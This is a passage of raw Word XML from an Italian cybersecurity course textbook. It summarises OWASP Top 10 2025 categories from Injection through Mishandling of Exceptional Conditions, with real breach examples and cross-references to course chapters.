        <w:t xml:space="preserve">comandi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La famiglia comprende:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(comandi SQL iniettati in query),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(XSS, codice JavaScript iniettato in pagine HTML),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(comandi di shell iniettati),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">LDAP Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NoSQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e molti altri. È la categoria con il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">maggior numero di CVE registrati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in assoluto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio reale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il caso TalkTalk del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (157.000 clienti esposti, multa di £400.000) è una SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dove nel corso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> — SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(cardine) e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> — XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="187"/>
    <w:bookmarkStart w:id="188" w:name="Xe2ea7e471262e534212270dc13b25bb269f3fda"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A06:2025 — Insecure Design (progettazione insicura)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A differenza delle altre voci che parlano di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">errori di implementazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, qui si parla di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">errori di progettazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il codice fa esattamente quello che è stato progettato per fare, ma il progetto stesso era insicuro. Esempi: una funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">recupero password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che invia la password vecchia in chiaro via email; un’app bancaria che permette bonifici senza richiedere la conferma con un secondo fattore; un sistema di acquisto che si fida del prezzo inviato dal client (eBay 2008, </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa fare contro l’Insecure Design.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Threat modeling in fase di analisi, revisione tra pari, test di sicurezza fin dalle prime fasi del ciclo di sviluppo (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">shift left</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dove nel corso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Trattata trasversalmente nei capitoli successivi quando emerge il tema. Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">threat modeling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">strutturato (framework STRIDE) è materia avanzata, prevista al secondo anno.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="188"/>
    <w:bookmarkStart w:id="189" w:name="Xdbd36bddeb96f7b4b705ea14813b0eb0df2e24b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A07:2025 — Authentication Failures (fallimenti dell’autenticazione)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sistema di autenticazione debole o mal implementato. Esempi: password debolissime accettate; nessun blocco dopo molti tentativi falliti (apre alla forza bruta); sessioni che non scadono mai; recupero password con domande di sicurezza banali (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nome del primo animale domestico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); assenza di autenticazione a due fattori per operazioni critiche; bug nella gestione dei token JWT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio reale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Twitter, gennaio 2023</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: un attaccante ha sfruttato un endpoint API che permetteva di scoprire se un dato indirizzo email corrispondeva a un account, senza alcun rate limiting. Risultato:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">5,4 milioni di account</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">identificati con i relativi indirizzi email, dati esposti su forum criminali.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dove nel corso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cenni nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (password robuste) e nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (autorizzazione). La trattazione completa di JWT, OAuth e MFA è materia avanzata.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="189"/>
    <w:bookmarkStart w:id="190" w:name="Xc726d3e5469aba5f8c424bcb668520d9159331a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A08:2025 — Software or Data Integrity Failures (fallimenti di integrità di software o dati)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il sistema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">si fida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di codice o dati senza verificarne l’integrità. Esempi: aggiornamenti applicati senza verificare la firma digitale; deserializzazione di dati non controllati (la libreria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pickle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di Python ne è famosa); pipeline CI/CD che pubblicano artefatti senza verifica; plugin o moduli caricati da fonti non verificate.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Differenza con A03</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: A03 è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">upstream</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(le tue dipendenze sono compromesse), A08 è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">interno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(qualcuno tampera con i tuoi artefatti dopo il build, o il tuo codice deserializza dati non sicuri).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio reale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SolarWinds, 2020</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: un attaccante ha compromesso il sistema di build di SolarWinds Orion, un software di gestione di rete usato da migliaia di organizzazioni e governi. Le release ufficiali di Orion,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">firmate digitalmente da SolarWinds stessa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, contenevano una backdoor. Compromissioni a cascata in centinaia di vittime, fra cui agenzie del governo americano. Caso da manuale di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fallimento di integrità del software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dove nel corso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Solo cenni nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. La deserializzazione insicura è materia avanzata.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="190"/>
    <w:bookmarkStart w:id="191" w:name="Xd8ac79f4d0be1263187958ac0381529b52e3a35"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A09:2025 — Security Logging &amp; Alerting Failures (fallimenti di registrazione e allarmistica)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L’applicazione non registra (o registra male) gli eventi di sicurezza, o non genera</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">allarmi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quando dovrebbe. Conseguenza: gli attacchi passano inosservati per settimane o mesi, e quando vengono scoperti è impossibile ricostruire cosa sia successo. Tipico: l’azienda scopre il breach</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mesi dopo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, perché qualcuno trova i dati in vendita su un forum criminale, non perché i propri sistemi abbiano dato l’allarme.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Statistica scomoda.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il rapporto annuale di IBM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cost of a Data Breach</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">riporta da anni che il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tempo medio per identificare un breach è di oltre 200 giorni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. In quei 200 giorni l’attaccante è dentro, fa quello che vuole, esfiltra ciò che gli pare.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cambio di nome rispetto al 2021.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Si chiamava</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Logging and Monitoring Failures</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l’aggiunta di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Alerting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sottolinea che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">registrare non basta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— bisogna che qualcuno (un sistema automatico o un essere umano) venga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">avvertito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quando succede qualcosa di anomalo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dove nel corso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cenni nei capitoli normativi (GDPR e NIS 2 prevedono notifiche entro 72 ore). I sistemi SIEM (Wazuh, Splunk, ELK) sono materia di moduli specifici.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="191"/>
    <w:bookmarkStart w:id="192" w:name="Xb67b53295e4c1511ec3f68773bb1d80f12a110e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A10:2025 — Mishandling of Exceptional Conditions (gestione errata delle condizioni eccezionali)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Categoria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">completamente nuova nel 2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Si riferisce a vulnerabilità che si manifestano quando il sistema è sotto stress, riceve input inattesi, o si trova in condizioni di errore: stack trace pubblicate al pubblico (rivelano informazioni interne); blocchi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">try/except</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che ingoiano errori di sicurezza facendoli passare (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">fail open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— vedi il principio del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">); dereferenze di puntatori nulli che fanno crashare il servizio (denial of service); messaggi di errore che restituiscono comportamenti diversi a seconda del problema, permettendo a un attaccante di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dedurre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">informazioni interne (esempio classico:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">utente non trovato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">password errata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, che permette di enumerare gli account validi).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Perché entra nel 2025.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">50% dei rispondenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">al survey OWASP ha indicato la gestione delle condizioni eccezionali come la sua principale preoccupazione emergente. È un tipo di vulnerabilità che gli scanner automatici trovano poco — perché si manifesta solo sotto certe condizioni — ma che gli attaccanti esperti sfruttano regolarmente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dove nel corso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Trasversale. Il principio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fail secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> ne è la difesa fondamentale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="192"/>
    <w:bookmarkEnd w:id="193"/>
    <w:bookmarkStart w:id="194" w:name="Xd9b4d46816bf4c6e39380406e22e630a66cdc46"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="490" w:name="sec_4_5"/>
      <w:r>
